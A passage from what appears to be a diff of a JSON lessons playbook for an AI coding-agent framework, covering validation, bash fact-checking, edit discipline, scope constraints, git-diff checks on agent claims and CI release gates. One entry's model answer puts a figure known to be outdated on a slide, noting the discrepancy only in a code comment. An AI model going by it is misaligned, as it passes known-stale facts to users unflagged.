hasn't finished planning their trip\n- **They align**: Technical flag tracks business state\n\n## Testing Results\nThe plan endpoint (POST /plans/{user_id}) has unexpected behavior when an incomplete plan (complete=false) already exists...\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "qual-0001", - "impl-0001" - ], - "tags": [ - "documentation", - "glossary", - "ambiguity", - "terminology", - "communication", - "api", - "specification", - "domain-language" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0008", - "content": "Multi-Layered Defensive Programming: Implement validation at multiple defensive layers to prevent invalid states and provide actionable error messages. Layer 1: Input validation (check parameters before processing). Layer 2: State validation (verify preconditions like 'plan exists' before accessing properties). Layer 3: Clear error messages (include recovery instructions, not just failure description). Pattern proven: adding null check before plan.subtasks prevents AttributeError crash, replacing with ValueError('No active plan exists. Create plan first...') guides users to resolution. Each layer serves different purpose: input catches malformed data, state catches workflow violations, messages enable self-service recovery. Apply to APIs, CLIs, and internal functions.", - "code_example": "```python\n# ❌ POOR - single layer, crashes with cryptic error\ndef update_subtask(self, subtask_id: int, status: str):\n plan = self._load_plan() # May return None\n for subtask in plan.subtasks: # ❌ AttributeError: 'NoneType' object has no attribute 'subtasks'\n if subtask.id == subtask_id:\n subtask.status = status\n\n# ✅ GOOD - multi-layered defensive programming\ndef update_subtask(self, subtask_id: int, status: str, error: Optional[str] = None):\n # Layer 1: Input validation\n if not isinstance(subtask_id, int) or subtask_id < 1:\n raise ValueError(f\"Invalid subtask_id: {subtask_id}. Must be positive integer.\")\n if status not in ['pending', 'in_progress', 'completed', 'failed']:\n raise ValueError(f\"Invalid status: {status}. Must be one of: pending, in_progress, completed, failed.\")\n \n # Layer 2: State validation\n plan = self._load_plan()\n if plan is None:\n raise ValueError(\n \"No active plan exists. Create a plan first using: \"\n \"'python -m mapify_cli.recitation_manager create '\"\n )\n \n # Layer 3: Business logic with clear error messages\n for subtask in plan.subtasks:\n if subtask.id == subtask_id:\n subtask.status = status\n if error:\n subtask.error = error\n return\n \n raise ValueError(\n f\"Subtask {subtask_id} not found in plan. \"\n f\"Valid subtask IDs: {[s.id for s in plan.subtasks]}\"\n )\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "arch-0003", - "test-0008" - ], - "tags": [ - "defensive-programming", - "validation", - "error-handling", - "python", - "api", - "cli", - "user-experience" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0009", - "content": "Fact Extraction Bash Verification Protocol: When agents extract facts from documentation about codebases (README, wikis, specs), ALWAYS verify EVERY claim using bash commands before recording to memory or playbook. Documentation can be outdated, but codebase is ground truth. Required verifications: (1) File existence claims: ls, find, test -f. (2) Directory structure claims: tree, ls -R. (3) Code pattern claims: grep, rg with pattern. (4) Quantity claims: wc -l, find | wc. Template must encode verification as MANDATORY step, not optional suggestion. Pattern prevents documentation rot where extracted 'facts' diverge from reality.", - "code_example": "```bash\n# ❌ INCORRECT - extract from docs without verification\necho \"Project has 15 agent templates\" >> facts.txt\n# Risk: Documentation may be stale\n\n# ✅ CORRECT - verify every claim with bash\n# Claim: \"Project has agent templates in src/templates/\"\ntest -d src/templates && echo \"✅ Directory exists\" || echo \"❌ FAILED\"\nls src/templates/*.md | wc -l # Actual count: 12 (not 15!)\n\n# Claim: \"All templates use YAML frontmatter\"\ngrep -L '^---' src/templates/*.md # Find templates WITHOUT frontmatter\n# Result: 3 templates lack frontmatter (claim FALSE)\n\n# ONLY record verified facts:\necho \"Project has $(ls src/templates/*.md | wc -l) agent templates\" >> facts.txt\necho \"9/12 templates use YAML frontmatter (3 missing)\" >> facts.txt\n```", - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153726Z", - "last_used_at": "2025-10-21T15:36:06.017156Z", - "related_bullets": [ - "impl-0005", - "test-0004" - ], - "tags": [ - "verification", - "bash", - "fact-extraction", - "documentation", - "ground-truth", - "map-framework", - "agent", - "template" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0010", - "content": "Incremental Fix Application vs Content Regeneration: When applying fixes to existing files, ALWAYS use Edit tool for targeted changes. NEVER use Write tool to regenerate entire file content. Edit tool preserves git history granularity (shows what changed), prevents unintended modifications to unrelated code, and reduces token usage. Write tool appropriate ONLY for new file creation, not modifications. Pattern proven: Edit tool for single-line fixes maintains clean git diffs, Write tool regeneration creates noisy diffs showing entire file as changed. This principle applies to all file modifications regardless of file size.", - "code_example": "```python\n# ❌ INCORRECT - regenerate entire file with Write\nfile_content = read_file('config.py')\nfixed_content = file_content.replace('old_value', 'new_value')\nwrite_file('config.py', fixed_content) \n# Git diff: shows ENTIRE file as changed (noisy)\n\n# ✅ CORRECT - targeted edit with Edit tool\nedit_file(\n file_path='config.py',\n old_string='old_value',\n new_string='new_value'\n)\n# Git diff: shows only changed line (clean)\n\n# Pattern applies even for multi-line fixes:\nedit_file(\n file_path='orchestrator.py',\n old_string='''def execute_subtask(self, task):\n result = actor.execute(task)\n return result''',\n new_string='''def execute_subtask(self, task):\n logger.info(f'Executing {task.id}')\n result = actor.execute(task)\n logger.info(f'Completed {task.id}')\n return result'''\n)\n# Preserves surrounding context, clean diff\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153734Z", - "last_used_at": "2025-10-20T23:37:01.153735Z", - "related_bullets": [ - "impl-0003", - "impl-0005" - ], - "tags": [ - "edit-tool", - "write-tool", - "incremental", - "git-diff", - "file-modification", - "python", - "map-framework", - "code-quality" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0011", - "content": "Reference-Before-Implementation Pattern: When creating new artifacts that extend existing series (e.g., verified_facts_workflow.txt extending verified_facts_core.txt), ALWAYS extract format patterns from existing artifacts FIRST before implementation. Use grep to identify structural elements (heading formats, bullet prefixes, delimiter patterns) and replicate exactly. This prevents format inconsistency causing Monitor rejections due to style mismatches. Pattern: grep '## ' to extract heading style, grep '\\*\\*Fact:\\*\\*' to extract fact prefix format. Single upfront extraction (5 minutes) prevents multiple Monitor rejection cycles (hours).", - "code_example": "```bash\n# ❌ INCORRECT - implement new artifact without checking existing format\necho \"# New Verified Facts\\nFact: Pattern A exists\" > new_file.txt\n# Risk: Format mismatch → Monitor rejection\n\n# ✅ CORRECT - extract format from existing artifact first\n# Step 1: Identify structural elements\ngrep '^## ' existing_verified_facts.txt # Heading format: '## Section Name'\ngrep '\\*\\*Fact:' existing_verified_facts.txt # Fact prefix: '**Fact:**'\ngrep '^###' existing_verified_facts.txt # Subsection format: '### Subsection'\n\n# Step 2: Document format patterns\necho \"Format rules:\n- Headings: ## for sections, ### for subsections\n- Facts: **Fact:** prefix, numbered facts NOT used\n- Delimiters: blank line between facts\"\n\n# Step 3: Implement new artifact following extracted format\ncat > new_verified_facts.txt << 'EOF'\n## New Section Name\n\n**Fact:** Pattern A exists in src/templates/\n\n**Fact:** Pattern B uses YAML frontmatter\nEOF\n\n# Verification: compare format consistency\ndiff <(head -5 existing_verified_facts.txt) <(head -5 new_verified_facts.txt)\n```", - "tags": [ - "format-extraction", - "consistency", - "grep", - "bash", - "documentation", - "monitor", - "map-framework", - "artifact-creation" - ], - "helpful_count": 2, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014406Z", - "related_bullets": [ - "impl-0009", - "test-0004" - ], - "last_used_at": "2025-10-21T14:46:01.752274Z" - }, - { - "id": "impl-0012", - "content": "Verification Completeness After Fixes: When fixing issues reported by validation agents, ALWAYS verify that ALL instances are fixed, not just the first few. Use quantitative verification (count before/after) and exhaustive search (grep, find) to ensure completeness. Example: if Monitor reports '4 duplicate pairs', after removal verify with 'grep -c duplicate' or count operation that 0 remain, not just that 2 specific IDs were removed. Incomplete fixes cause repeated iterations for the same issue category. Pattern proven: quantitative verification (55 facts counted with grep -c) prevents claiming incorrect numbers (56) in deliverables.", - "code_example": "```bash\n# ❌ INCORRECT - fix first few instances, assume done\ngrep 'duplicate_id_001' facts.txt # Found, remove it\ngrep 'duplicate_id_002' facts.txt # Found, remove it\n# Assumption: fixed all duplicates (WRONG - 2 more remain)\n\n# ✅ CORRECT - quantitative verification of complete fix\n# Before fix: count duplicates\nbefore_count=$(grep -c 'duplicate_pattern' facts.txt)\necho \"Before: $before_count duplicates found\"\n\n# Apply fix to ALL instances\nsed -i '/duplicate_pattern/d' facts.txt\n\n# After fix: verify 0 remain\nafter_count=$(grep -c 'duplicate_pattern' facts.txt)\necho \"After: $after_count duplicates remain\"\n\nif [ \"$after_count\" -ne 0 ]; then\n echo \"❌ INCOMPLETE FIX: $after_count duplicates still present\"\n exit 1\nfi\n\necho \"✅ COMPLETE FIX: all duplicates removed (verified)\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T09:04:13.348159Z", - "last_used_at": "2025-10-21T09:04:13.348163Z", - "related_bullets": [ - "impl-0009", - "test-0009" - ], - "tags": [ - "verification", - "completeness", - "quantitative", - "bash", - "grep", - "validation", - "fix-verification", - "exhaustive-search", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0013", - "content": "Source Material Boundary Validation: When tasks specify source material constraints (e.g., 'Use ONLY verified_facts.txt', 'Implement using library X'), treat these as SCOPE constraints (must use specific sources) not QUALITY constraints (any accurate source). Before implementation: 1) Parse constraint type explicitly, 2) Create allowed/forbidden source lists, 3) Read allowed sources to build working set, 4) Implement ONLY from working set, 5) Validate each fact/component's provenance. Default to strictest interpretation when ambiguous - if unsure whether 'verified facts' means quality or scope, treat as scope (specific file boundary). This prevents using correct-looking but out-of-scope material.", - "code_example": "```markdown\n# Task: Create docs using ONLY verified_facts.txt\n\n# ❌ INCORRECT - Quality constraint interpretation\n\"I'll use accurate metrics from CHANGELOG.md since they're verified\"\n→ Uses out-of-scope CHANGELOG.md\n\n# ✅ CORRECT - Scope constraint interpretation\n## Step 1: Parse constraint type\n\"ONLY verified_facts.txt\" → Scope constraint (specific file)\n\n## Step 2: Create source boundary\nAllowed: [verified_facts.txt]\nForbidden: [CHANGELOG.md, docs/, memory]\n\n## Step 3: Build working set\nRead verified_facts.txt → Extract all facts → Working set\n\n## Step 4: Validate provenance\nFor each claim:\n Source file = ?\n In allowed list? YES → USE, NO → REJECT\n```", - "helpful_count": 3, - "harmful_count": 0, - "created_at": "2025-10-21T09:45:10.125668Z", - "last_used_at": "2025-10-21T15:36:06.017184Z", - "related_bullets": [ - "impl-0011", - "impl-0009" - ], - "tags": [ - "source-validation", - "scope-constraint", - "boundary-validation", - "content-generation", - "provenance", - "markdown", - "documentation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0014", - "content": "Constraint Type Classification: Before implementing content generation or configuration tasks, explicitly classify each requirement as Quality constraint (satisfied by any compliant approach) vs Scope constraint (satisfied only by specific allowed components/sources). Quality: 'code must be readable', 'facts must be accurate'. Scope: 'use library X', 'source from file Y'. When encountering ambiguous phrasing like 'verified facts' (could mean quality 'facts that are verified' or scope 'facts from verified_facts.txt'), default to scope interpretation (stricter boundary). Document classification in implementation notes: 'Requirement X classified as scope constraint - allowed sources: [A, B], forbidden: [C, D]'.", - "code_example": "```python\n# Requirement: \"Use ONLY verified database connections\"\n\n# ❌ INCORRECT - Assumes quality constraint\nconn = create_any_valid_connection() # Any working connection\n\n# ✅ CORRECT - Classifies as scope constraint\n# Step 1: Parse constraint\n# \"ONLY verified database connections\" → Scope or Quality?\n# Has \"ONLY\" keyword → Likely scope (exclusive boundary)\n\n# Step 2: Document classification\n# Constraint type: SCOPE\n# Allowed sources: verified_connections.yaml\n\n# Step 3: Implement with boundary validation\nimport yaml\nwith open('verified_connections.yaml') as f:\n allowed_conns = yaml.safe_load(f)\nif connection_name in allowed_conns:\n conn = create_connection(allowed_conns[connection_name])\nelse:\n raise ValueError(f\"{connection_name} not in verified sources\")\n```", - "helpful_count": 2, - "harmful_count": 0, - "created_at": "2025-10-21T09:45:10.125685Z", - "last_used_at": "2025-10-21T15:36:06.017190Z", - "related_bullets": [ - "impl-0011" - ], - "tags": [ - "constraint-classification", - "scope-vs-quality", - "requirement-parsing", - "boundary-validation", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0015", - "content": "SCOPE Compliance Priority Rule: When SCOPE constraints limit documentation completeness (relevant accurate content exists in forbidden sources), ALWAYS prioritize Compliance > Completeness > Accuracy hierarchy. Accept reduced scope documentation rather than violating source boundaries. SCOPE constraint 'Use ONLY file X' means exclusive boundary - content from file Y is invalid even if factually superior. If completeness is critical to task success, explicitly request scope expansion ('Can I also use file Y?') BEFORE implementation. Never self-authorize scope expansion to 'improve quality'. Pattern prevents Monitor rejection loops where Actor uses correct-but-forbidden sources.", - "code_example": "```python\n# Task: Create presentation using ONLY verified_facts.txt\n# Challenge: verified_facts.txt has 12 agent templates, but codebase has 13\n\n# ❌ INCORRECT - Prioritize completeness/accuracy over compliance\ndef create_presentation():\n # \"verified_facts.txt is outdated, I'll check actual code for accuracy\"\n actual_count = len(glob('src/templates/agents/*.md')) # 13\n slide_content = f\"System has {actual_count} agent templates\" # SCOPE VIOLATION\n # Rationale: \"More accurate\"\n # Problem: Violates 'ONLY verified_facts.txt' constraint\n\n# ✅ CORRECT - Prioritize compliance over completeness\ndef create_presentation_scope_aware():\n # Step 1: Read designated source ONLY\n facts = read_file('verified_facts.txt')\n template_count = extract_fact(facts, 'agent templates') # \"12 templates\"\n \n # Step 2: Accept reduced scope\n slide_content = f\"System has {template_count} agent templates\" # From source\n # Known limitation: Source may be outdated (actual: 13)\n # Decision: Compliance > Accuracy for SCOPE constraints\n \n # Step 3: Request scope expansion if completeness critical\n if task_requires_completeness:\n raise ScopeExpansionRequest(\n \"verified_facts.txt shows 12 templates but codebase has 13. \"\n \"Can I verify against codebase to ensure completeness?\"\n )\n \n return slide_content\n\n# Priority Hierarchy for SCOPE Constraints:\n# 1. Compliance (use only allowed sources) ← HIGHEST\n# 2. Completeness (include all relevant info) ← MEDIUM \n# 3. Accuracy (match ground truth) ← LOWEST\n# If conflict, sacrifice lower priority to preserve higher\n```", - "related_bullets": [ - "impl-0014", - "test-0010", - "impl-0013" - ], - "tags": [ - "scope-constraints", - "compliance", - "validation", - "map-framework", - "monitor", - "constraints" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T14:46:01.752285Z", - "last_used_at": "2025-10-21T15:36:06.017192Z", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0016", - "content": "Procedural Pattern Enforcement: Transform constraint-type patterns (SCOPE, SECURITY, VALIDATION) from declarative guidance ('follow SCOPE rules') to executable procedures with numbered pre-flight checklists, copy-pasteable verification commands, and economic incentives (violation detection cheaper than violation fixing). Gap between pattern awareness (knowledge-retrieval mode) and pattern execution (execution-discipline mode) causes violations even when pattern is in context. Procedural enforcement bridges gap: Actor claims to 'apply impl-0015' but violates SCOPE (iteration 1) → Checklist with verification commands forces execution (iteration 2 succeeds). Apply to patterns with compliance requirements, not creative/judgment tasks.", - "code_example": "```python\n# ❌ DECLARATIVE PATTERN - Awareness only, execution optional\npattern_impl_0015 = {\n \"title\": \"SCOPE Compliance Priority Rule\",\n \"content\": \"When SCOPE constraints exist, prioritize Compliance > Completeness > Accuracy.\",\n \"guidance\": \"Follow the hierarchy when making decisions.\"\n}\n# Result: Actor 'understands' pattern but violates SCOPE in practice\n\n# ✅ PROCEDURAL PATTERN - Executable enforcement\npattern_impl_0015_procedural = {\n \"title\": \"SCOPE Compliance Priority Rule\",\n \n # Pre-flight checklist (MANDATORY)\n \"checklist\": [\n \"[ ] Step 1: Identify SCOPE constraint keywords ('ONLY', 'MUST use', 'from file X')\",\n \"[ ] Step 2: Extract allowed sources list (e.g., ['verified_facts.txt'])\",\n \"[ ] Step 3: Extract forbidden sources list (e.g., ['CHANGELOG.md', 'memory', 'code'])\",\n \"[ ] Step 4: Read ONLY allowed sources, build working set\",\n \"[ ] Step 5: For each fact/component, validate: source in allowed_list?\",\n \"[ ] Step 6: BEFORE finalizing, run verification command below\"\n ],\n \n # Copy-pasteable verification command\n \"verification\": '''\n# Verify no forbidden sources used\ngrep -i 'CHANGELOG\\|memory\\|actual count' output.txt && echo \"❌ SCOPE VIOLATION\" || echo \"✅ COMPLIANT\"\n''',\n \n # Economic incentive (detection << fixing)\n \"cost_analysis\": {\n \"violation_detection\": \"5 seconds (grep command)\",\n \"violation_fixing\": \"15 minutes (Monitor rejection → rework iteration)\",\n \"roi\": \"180x time savings by running verification upfront\"\n },\n \n # Guidance (declarative part still present but secondary)\n \"principle\": \"Compliance > Completeness > Accuracy hierarchy\"\n}\n\n# Pattern application enforcement:\n# 1. Checklist creates explicit steps (can't skip accidentally)\n# 2. Verification command provides instant feedback (cheap detection)\n# 3. Economic incentive creates rational motivation (5s prevents 15min rework)\n# Result: Execution discipline, not just awareness\n```", - "related_bullets": [ - "impl-0015", - "impl-0014", - "impl-0013", - "test-0010" - ], - "tags": [ - "meta-pattern", - "procedural-enforcement", - "checklist", - "verification", - "execution-discipline", - "constraint-compliance", - "scope", - "map-framework", - "pattern-design", - "python" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T15:36:06.017196Z", - "last_used_at": "2025-10-21T15:36:06.017197Z", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0017", - "content": "Phased Migration Temporary State Documentation: When breaking large documentation updates into subtasks (phased migration), explicitly acknowledge temporary inconsistencies in trade_offs field. Document WHAT sections remain inconsistent (with specific line numbers/section names), WHEN they will be resolved (which subtask number), and WHY the temporary state is acceptable (enables independent validation, manages risk of large atomic changes). This transforms potential validation failures into transparent technical debt management visible to all agents.", - "code_example": "```json\n// ❌ BAD - Silent inconsistency causes validation failures\n{\n \"subtask_id\": \"2.1\",\n \"description\": \"Update Section 3 to remove deprecated patterns\",\n \"trade_offs\": \"Using phased approach for safety\"\n}\n\n// ✅ GOOD - Explicit temporary state documentation\n{\n \"subtask_id\": \"2.1\",\n \"description\": \"Update Section 3 to remove deprecated patterns\",\n \"trade_offs\": \"TEMPORARY INCONSISTENCY: Section 2 references (lines 145-167) still point to old Section 5 content being removed in this subtask. RESOLVES IN: Subtask 2.2 will update Section 2 cross-references. WHY ACCEPTABLE: Allows independent validation of Section 3 removal before cascading updates, reduces risk of large atomic change breaking multiple sections simultaneously.\"\n}\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T12:06:20.145325Z", - "last_used_at": "2025-10-23T12:21:40.807524Z", - "related_bullets": [ - "impl-0001", - "impl-0006" - ], - "tags": [ - "phased-migration", - "documentation", - "validation", - "technical-debt", - "trade-offs" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0018", - "content": "Actor Tool Invocation Verification with Git Diff: Actors sometimes describe file changes without invoking Edit/Write tools, claiming completion without executing modifications. Monitor MUST verify actual file state using git diff to detect claimed-but-not-executed changes. Pattern: Actor claims 'Added [1.0.0] section to CHANGELOG.md' → Monitor runs 'git diff CHANGELOG.md' → No changes shown → Reject with 'CRITICAL: Changes NOT applied, git diff shows no modifications'. Git diff validation catches both missing tool invocations AND incorrect tool choices (Write instead of Edit). This enforces tool invocation discipline - descriptions are not substitutes for actual Edit/Write/Bash execution.", - "code_example": "```python\n# ❌ ACTOR ANTI-PATTERN - claiming without executing\n# Actor output: \"I added [1.0.0] section to CHANGELOG.md\"\n# (No Edit tool call in Actor's actions, OR used Write claiming 'creation')\n\n# ✅ MONITOR VALIDATION - git diff verification\nimport subprocess\n\ndef validate_actor_file_changes(actor_output, file_path, expected_change_description):\n \"\"\"Verify Actor's claimed file changes using git diff.\n\n Returns:\n dict: {\"valid\": bool, \"reason\": str, \"diff_output\": str}\n \"\"\"\n # Run git diff to check actual changes\n result = subprocess.run(\n ['git', 'diff', file_path],\n capture_output=True,\n text=True\n )\n diff_output = result.stdout\n\n if not diff_output.strip():\n return {\n \"valid\": False,\n \"reason\": f\"CRITICAL: Changes NOT applied. Actor claimed '{expected_change_description}' but git diff {file_path} shows no modifications. Actor likely described changes without invoking Edit/Write tool, OR used wrong tool (Write for existing file).\",\n \"diff_output\": \"(empty - no changes detected)\"\n }\n\n # Optionally verify specific content in diff\n # For CHANGELOG: check if [1.0.0] appears in added lines\n added_lines = [line for line in diff_output.split('\\n') if line.startswith('+')]\n\n return {\n \"valid\": True,\n \"reason\": f\"Changes verified: git diff shows {len(added_lines)} added lines\",\n \"diff_output\": diff_output\n }\n\n# Usage in Monitor:\nvalidation = validate_actor_file_changes(\n actor_output,\n file_path=\"CHANGELOG.md\",\n expected_change_description=\"Added [1.0.0] initial release section\"\n)\n\nif not validation[\"valid\"]:\n raise MonitorRejection(validation[\"reason\"])\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T09:20:52.064779+00:00", - "last_used_at": "2025-10-25T21:15:57.637624+00:00", - "related_bullets": [ - "impl-0001", - "impl-0003" - ], - "tags": [ - "map-framework", - "actor", - "monitor", - "validation", - "tool-invocation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0019", - "content": "Idempotent Documentation Scripts: All user-facing scripts in documentation that modify environment configuration (PATH, shell configs, Windows registry) MUST include idempotency checks before making changes. Users frequently re-run documentation commands during troubleshooting. Check if change already applied (e.g., PATH already contains target directory, registry key exists with correct value) and skip modification if present. Always use conditional logic: 'if not already configured, then configure'. This prevents duplicate PATH entries, redundant registry keys, and broken shell configurations from repeated execution. Critical for onboarding docs where users may restart installation multiple times.", - "code_example": "```powershell\n# ❌ NOT IDEMPOTENT - adds duplicate PATH entries\n$newPath = \"C:\\\\Program Files\\\\MyApp\\\\bin\"\n[Environment]::SetEnvironmentVariable(\n \"PATH\",\n $env:PATH + \";\" + $newPath,\n [EnvironmentVariableTarget]::User\n)\n\n# ✅ IDEMPOTENT - checks before modifying\n$newPath = \"C:\\\\Program Files\\\\MyApp\\\\bin\"\n$currentPath = [Environment]::GetEnvironmentVariable(\"PATH\", [EnvironmentVariableTarget]::User)\n\nif ($currentPath -notlike \"*$newPath*\") {\n Write-Host \"Adding $newPath to PATH...\"\n [Environment]::SetEnvironmentVariable(\n \"PATH\",\n $currentPath + \";\" + $newPath,\n [EnvironmentVariableTarget]::User\n )\n} else {\n Write-Host \"$newPath already in PATH, skipping\"\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T15:34:43.387364Z", - "last_used_at": "2025-10-23T15:34:43.387371Z", - "related_bullets": [ - "doc-0001", - "doc-0002" - ], - "tags": [ - "idempotency", - "documentation", - "installation", - "powershell", - "environment", - "path", - "user-experience" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0046", - "content": "UV tool CLI isolation: Install Python CLI tools via UV tool entry points (pyproject.toml [project.scripts]) rather than direct module imports. Prevents ModuleNotFoundError when using 'uv tool install'.", - "code_example": "", - "helpful_count": 8, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892087Z", - "last_used_at": "2025-10-24T13:29:43.892094Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0047", - "content": "Lazy imports in CLI commands: Use function-level imports to reduce startup time. Pattern: 'def main(): from package import module; module.run()'.", - "code_example": "", - "helpful_count": 7, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892102Z", - "last_used_at": "2025-10-24T13:29:43.892103Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0048", - "content": "Backward compatibility during CLI migration: Maintain old import paths as shims with deprecation warnings. Document migration in CHANGELOG.", - "code_example": "", - "helpful_count": 8, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892105Z", - "last_used_at": "2025-10-24T13:29:43.892105Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0024", - "content": "Tiered Refactoring with Validation Checkpoints: When structural refactoring affects 10+ files, organize changes into priority-based tiers and validate after each tier before proceeding. Tier 1 (Critical): Core functionality, production code with zero tolerance for breakage. Tier 2 (Internal): Development tools, internal scripts, test infrastructure. Tier 3 (Archive): Historical documentation, deprecated examples. Execute Tier 1 → validate (run tests, verify imports) → Tier 2 → validate → Tier 3. If any tier fails validation, stop and fix before proceeding. This containment strategy limits blast radius - Tier 1 failure caught early prevents cascading to 50+ files. Commit each tier separately for granular rollback capability.", - "code_example": "```bash\n# ❌ RISKY - Atomic refactoring of 50 files\n# Update all 50 files at once\nfor file in $(find . -name '*.py'); do\n sed -i 's/old_import/new_import/g' $file\ndone\ngit commit -am \"Refactor all imports\"\n# Result: If 1 file breaks, entire commit must be reverted\n\n# ✅ SAFE - Tiered execution with checkpoints\n# Tier 1: Critical production code (5 files)\ngit mv src/old_module/ src/new_module/\nsed -i 's/old_module/new_module/g' src/main.py src/api.py src/core.py\ngit commit -m \"Tier 1: Refactor core module imports\"\npytest tests/critical/ # CHECKPOINT - must pass\n\n# Tier 2: Internal tools (15 files) \nsed -i 's/old_module/new_module/g' scripts/*.py tools/*.py\ngit commit -m \"Tier 2: Update internal tool imports\"\npytest tests/ # CHECKPOINT - must pass\n\n# Tier 3: Documentation and examples (30 files)\nfind docs/ examples/ -name '*.md' -exec sed -i 's/old_module/new_module/g' {} +\ngit commit -m \"Tier 3: Update documentation references\"\n# Validation: grep to verify no old references remain\nrg 'old_module' --type py --type md || echo \"All updated\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485305Z", - "last_used_at": "2025-10-25T13:32:16.485306Z", - "related_bullets": [ - "doc-0008", - "arch-0002", - "tool-0013" - ], - "tags": [ - "refactoring", - "tiered-execution", - "validation", - "checkpoints", - "risk-mitigation", - "testing", - "bash", - "structural-change" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0025", - "content": "Deploy-What-You-Test Pattern (workflow_call): Use GitHub Actions workflow_call trigger to reuse CI workflow in release workflow, ensuring the exact artifacts that passed tests are published. CI workflow uploads build artifacts, release workflow downloads them via actions/download-artifact with matching run_id. Prevents drift between tested code and deployed code. Alternative approaches (re-running tests in release workflow or rebuilding artifacts) waste time and risk inconsistency.", - "code_example": "```yaml\n# ❌ INCORRECT - rebuild in release (drift risk)\nname: Release\non:\n workflow_dispatch:\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build # Rebuilt - may differ from CI!\n - uses: pypa/gh-action-pypi-publish@release/v1\n\n# ✅ CORRECT - reuse CI artifacts (deploy-what-you-test)\n# ci.yml (reusable)\nname: CI\non:\n workflow_call: # Can be called by other workflows\n pull_request:\njobs:\n test:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build\n - run: pytest\n - uses: actions/upload-artifact@v4\n with:\n name: dist\n path: dist/\n\n# release.yml\nname: Release\non:\n workflow_dispatch:\njobs:\n ci:\n uses: ./.github/workflows/ci.yml # Reuse CI workflow\n publish:\n needs: ci\n runs-on: ubuntu-latest\n steps:\n - uses: actions/download-artifact@v4\n with:\n name: dist\n path: dist/\n run-id: ${{ needs.ci.outputs.run_id }} # Same artifacts\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "ci-cd", - "github-actions", - "workflow-reuse", - "artifacts", - "deploy-what-you-test", - "consistency", - "workflow_call" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T21:43:28.723814+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0026", - "content": "Multi-Gate Release Validation: Add validation gates before irreversible operations (PyPI publish, Docker push, Git tag). Validate: 1) Tag format matches semver (v*.*.* pattern), 2) Tag version matches package metadata (__version__, pyproject.toml), 3) Artifacts exist and have expected format (.whl, .tar.gz), 4) Package quality checks pass (no syntax errors, imports work). Each gate should fail-fast with clear error message explaining what's wrong and how to fix. Prevents publishing broken releases that can't be deleted from PyPI.", - "code_example": "```yaml\n# ❌ INCORRECT - no validation, publishes broken releases\nname: Release\non:\n push:\n tags: ['v*']\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - run: python -m build\n - uses: pypa/gh-action-pypi-publish@release/v1 # No checks!\n\n# ✅ CORRECT - multi-gate validation\nname: Release\non:\n push:\n tags: ['v*']\njobs:\n validate:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n \n # Gate 1: Tag format validation\n - name: Validate tag format\n run: |\n if ! [[ \"${{ github.ref_name }}\" =~ ^v[0-9]+\\.[0-9]+\\.[0-9]+$ ]]; then\n echo \"Error: Tag must match semver (vX.Y.Z), got: ${{ github.ref_name }}\"\n exit 1\n fi\n \n # Gate 2: Version consistency\n - name: Validate version matches tag\n run: |\n TAG_VERSION=\"${GITHUB_REF_NAME#v}\" # Strip 'v' prefix\n PKG_VERSION=$(python -c \"import tomli; print(tomli.load(open('pyproject.toml', 'rb'))['project']['version'])\")\n if [[ \"$TAG_VERSION\" != \"$PKG_VERSION\" ]]; then\n echo \"Error: Tag version ($TAG_VERSION) != package version ($PKG_VERSION)\"\n exit 1\n fi\n \n # Gate 3: Artifact validation\n - run: python -m build\n - name: Validate artifacts exist\n run: |\n if ! ls dist/*.whl dist/*.tar.gz 1> /dev/null 2>&1; then\n echo \"Error: Expected .whl and 